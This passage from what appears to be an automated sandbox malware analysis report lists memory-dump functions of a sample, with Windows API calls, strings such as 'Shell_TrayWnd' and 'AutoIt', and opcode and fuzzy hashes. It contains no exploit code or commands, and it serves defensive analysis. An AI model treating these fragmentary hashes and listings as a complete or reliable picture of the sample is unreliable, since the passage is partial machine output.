                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _strncmp
                        • String ID: ,$UTF8)
                        • API String ID: 909875538-2632631837
                        • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                        • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                        • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                        • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                        APIs
                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        • wsprintfW.USER32 ref: 004560E9
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend_mallocwsprintf
                        • String ID: %d/%02d/%02d
                        • API String ID: 1262938277-328681919
                        • Opcode ID: a0b39a4cd3c0c8a7adb8db444dc879b20475413a32e353ad3a6ec36c60b55e02
                        • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                        • Opcode Fuzzy Hash: a0b39a4cd3c0c8a7adb8db444dc879b20475413a32e353ad3a6ec36c60b55e02
                        • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                        APIs
                        • FindWindowW.USER32 ref: 0044226C
                        • PostMessageW.USER32 ref: 0044227F
                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                        • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                        • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                        • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                        APIs
                        • FindWindowW.USER32 ref: 00442240
                        • PostMessageW.USER32 ref: 00442247
                          • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                        • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                        • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                        • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                        APIs
                        • MessageBoxW.USER32 ref: 00439522
                          • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Message_doexit
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 1993061046-4017498283
                        • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                        • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                        • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                        • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E